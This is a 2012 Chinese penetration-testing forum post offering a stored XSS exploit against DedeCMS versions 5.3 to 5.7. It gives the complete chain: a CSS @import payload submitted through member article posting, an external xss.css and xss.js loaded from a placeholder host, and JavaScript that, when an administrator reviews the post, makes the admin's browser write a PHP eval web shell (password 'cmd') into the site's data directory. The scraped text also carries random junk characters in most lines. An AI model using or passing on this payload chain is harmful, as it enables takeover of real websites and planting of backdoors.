找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1742|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
8 j* G; r( a. g& i4 P为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)+ S$ ~1 L4 O; C/ g* w
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。1 L3 i3 O+ s- |
下面说说利用方法。
! V# s$ ^& Y, u2 R, ]1 a+ n条件有2个:
8 U$ f; S$ P3 |6 Z, B* E  U& h) Z1.开启注册; R0 @( g6 ]) f8 f( L
2.开启投稿
& G- J, Z: R% ^9 A9 X# b注册会员----发表文章" S% B- r' \" e; O9 b! c3 j8 a
内容填写:
5 S; U  y  I# w: [复制代码# A* j8 ], g  y' R
<style>@im\port'\http://xxx.com/xss.css';</style>! Q, E  n9 F( r. t4 {- {6 ~7 R1 X
新建XSS.Css& G5 j5 J  s8 N+ |
复制代码; [' K2 k8 T- s
.body{
) R) T% b: h- J  ]2 Z$ p  }background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }' c( I" B. d1 d
新建xss.js 内容为5 a6 P3 V3 O7 u( \4 K& h- N! r
复制代码* A$ M7 I9 a8 h. D) m: |
1.var request = false;
$ V5 X* x3 W9 J1 i& e/ g3 u$ T. ]6 V' s2.if(window.XMLHttpRequest) {. Z+ P+ y$ N+ @, o% M5 t! @7 J
3.request = new XMLHttpRequest();: r& v/ A) A$ e6 J0 }
4.if(request.overrideMimeType) {
7 J. k  g6 z4 p8 D4 a5.request.overrideMimeType('text/xml');
" R& ^5 }8 B5 T9 z% @: G1 S( V6.}
$ j  E* \/ M" `  e7.} else if(window.ActiveXObject) {3 K5 Z5 Y; M+ R  M
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
1 j. k! P+ ~% \4 p1 P' q9 ?9.for(var i=0; i<versions.length; i++) {
6 ^! i- b' S! O, z' v10.try {
0 D/ _( @1 `2 k6 I+ O11.request = new ActiveXObject(versions);
$ A. A, Z3 c6 p  ?$ f; V& g. @12.} catch(e) {}9 O' `$ U5 ~6 E) S' J
13.}
" R6 r* x, t8 l4 }% ?  q* Q' g& Y% a14.}1 E0 ?: d1 t7 s6 [
15.xmlhttp=request;" P: Q2 S  b2 h( r
16.function getFolder( url ){
. f* h9 _/ x& I/ e17. obj = url.split('/')
, T* L8 j0 T# s5 \7 D' S18. return obj[obj.length-2]
9 V1 \2 g7 I& o2 n19.}% x" H9 _2 ~  `1 N6 p
20.oUrl = top.location.href;9 y+ p( |. U$ W' P# O
21.u = getFolder(oUrl);4 d/ y! T& X- [4 B  v
22.add_admin();
) ^5 o. v; z& K0 r5 }23.function add_admin(){
2 ?0 `; }; Z7 g) G; I24.var url= "/"+u+"/sys_sql_query.php";
3 F; {2 K7 z) `25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";+ C$ h; ]. Z( [$ S# t9 k+ c: X3 H
26.xmlhttp.open("POST", url, true);& P- v) K) @+ O9 ?0 h0 ]! V3 N# J
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");  z. u& W- y$ R# F8 w' P
28.xmlhttp.setRequestHeader("Content-length", params.length);% o7 W- \4 x* _& M
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
" \! n  q  C& g* y5 [30.xmlhttp.send(params);
* T  |9 \! V' @3 G3 n: U9 I1 F# V31.}) s$ j7 l5 u; c: ~" L0 l4 A. H
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表